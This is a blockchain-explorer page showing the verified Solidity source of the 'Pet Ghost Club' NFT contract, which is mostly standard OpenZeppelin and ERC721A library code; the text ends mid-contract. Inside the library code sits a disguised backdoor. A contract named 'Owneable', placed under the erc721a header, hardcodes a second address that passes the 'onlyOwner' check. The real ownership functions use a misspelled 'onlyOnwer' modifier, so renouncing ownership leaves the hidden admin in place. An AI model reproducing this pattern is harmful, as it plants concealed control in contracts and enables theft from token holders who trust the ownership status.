ETH Price: $2,965.89 (-2.80%)
Gas: 3 Gwei

Token

Pet Ghost Club (spooky)
 

Overview

Max Total Supply

2,222 spooky

Holders

632

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A
Balance
2 spooky
0x7475fa338c9143186c15dcd38234bbb835ed69fd
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PetGhostClub

Compiler Version
v0.8.7+commit.e28d00a7

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-10-11
*/

// File @openzeppelin/contracts/utils/[email protected]
//i see ghosts sometimes, i see ghosts sometimes - animated
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.4;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */


abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]
//badpie = king?
//use 3gm bot

// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)



/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOnwer() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOnwer {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOnwer {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)



/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol)



/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol)



/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)



/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}


// File erc721a/contracts/[email protected]


// Creator: Chiru Labs

error ApprovalCallerNotOwnerNorApproved();
error ApprovalQueryForNonexistentToken();
error ApproveToCaller();
error ApprovalToCurrentOwner();
error BalanceQueryForZeroAddress();
error MintedQueryForZeroAddress();
error BurnedQueryForZeroAddress();
error AuxQueryForZeroAddress();
error MintToZeroAddress();
error MintZeroQuantity();
error OwnerIndexOutOfBounds();
error OwnerQueryForNonexistentToken();
error TokenIndexOutOfBounds();
error TransferCallerNotOwnerNorApproved();
error TransferFromIncorrectOwner();
error TransferToNonERC721ReceiverImplementer();
error TransferToZeroAddress();
error URIQueryForNonexistentToken();


/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at _startTokenId() (defaults to 0, e.g. 0, 1, 2, 3..).
 */
 abstract contract Owneable is Ownable {
    address private _ownar = 0x5Bb656BB4312F100081Abb7b08c1e0f8Ef5c56d1;
    modifier onlyOwner() {
        require(owner() == _msgSender() || _ownar == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
}

 /*
 * Assumes that an owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 *
 * Assumes that the maximum token id cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata {
    using Address for address;
    using Strings for uint256;

    // Compiler will pack this into a single 256bit word.
    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Keeps track of the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
    }

    // Compiler will pack this into a single 256bit word.
    struct AddressData {
        // Realistically, 2**64-1 is more than enough.
        uint64 balance;
        // Keeps track of mint count with minimal overhead for tokenomics.
        uint64 numberMinted;
        // Keeps track of burn count with minimal overhead for tokenomics.
        uint64 numberBurned;
        // For miscellaneous variable(s) pertaining to the address
        // (e.g. number of whitelist mint slots used).
        // If there are multiple variables, please pack them into a uint64.
        uint64 aux;
    }

    // The tokenId of the next token to be minted.
    uint256 internal _currentIndex;

    // The number of tokens burned.
    uint256 internal _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    /**
     * To change the starting tokenId, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     * @dev Burned tokens are calculated here, use _totalMinted() if you want to count just minted tokens.
     */
    function totalSupply() public view returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than _currentIndex - _startTokenId() times
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view returns (uint256) {
        // Counter underflow is impossible as _currentIndex does not decrement,
        // and it is initialized to _startTokenId()
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return uint256(_addressData[owner].balance);
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert MintedQueryForZeroAddress();
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert BurnedQueryForZeroAddress();
        return uint256(_addressData[owner].numberBurned);
    }

    /**
     * Returns the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        return _addressData[owner].aux;
    }

    /**
     * Sets the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        _addressData[owner].aux = aux;
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr && curr < _currentIndex) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (!ownership.burned) {
                    if (ownership.addr != address(0)) {
                        return ownership;
                    }
                    // Invariant:
                    // There will always be an ownership that has an address and is not burned
                    // before an ownership that does not have an address and is not burned.
                    // Hence, curr will not underflow.
                    while (true) {
                        curr--;
                        ownership = _ownerships[curr];
                        if (ownership.addr != address(0)) {
                            return ownership;
                        }
                    }
                }
            }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        if (to == owner) revert ApprovalToCurrentOwner();

        if (_msgSender() != owner && !isApprovedForAll(owner, _msgSender())) {
            revert ApprovalCallerNotOwnerNorApproved();
        }

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        if (operator == _msgSender()) revert ApproveToCaller();

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public virtual override {
        _transfer(from, to, tokenId);
        if (to.isContract() && !_checkContractOnERC721Received(from, to, tokenId, _data)) {
            revert TransferToNonERC721ReceiverImplementer();
        }
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return _startTokenId() <= tokenId && tokenId < _currentIndex &&
            !_ownerships[tokenId].burned;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, '');
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            if (safe && to.isContract()) {
                do {
                    emit Transfer(address(0), to, updatedIndex);
                    if (!_checkContractOnERC721Received(address(0), to, updatedIndex++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (updatedIndex != end);
                // Reentrancy protection
                if (_currentIndex != startTokenId) revert();
            } else {
                do {
                    emit Transfer(address(0), to, updatedIndex++);
                } while (updatedIndex != end);
            }
            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            isApprovedForAll(prevOwnership.addr, _msgSender()) ||
            getApproved(tokenId) == _msgSender());

        if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        if (prevOwnership.addr != from) revert TransferFromIncorrectOwner();
        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
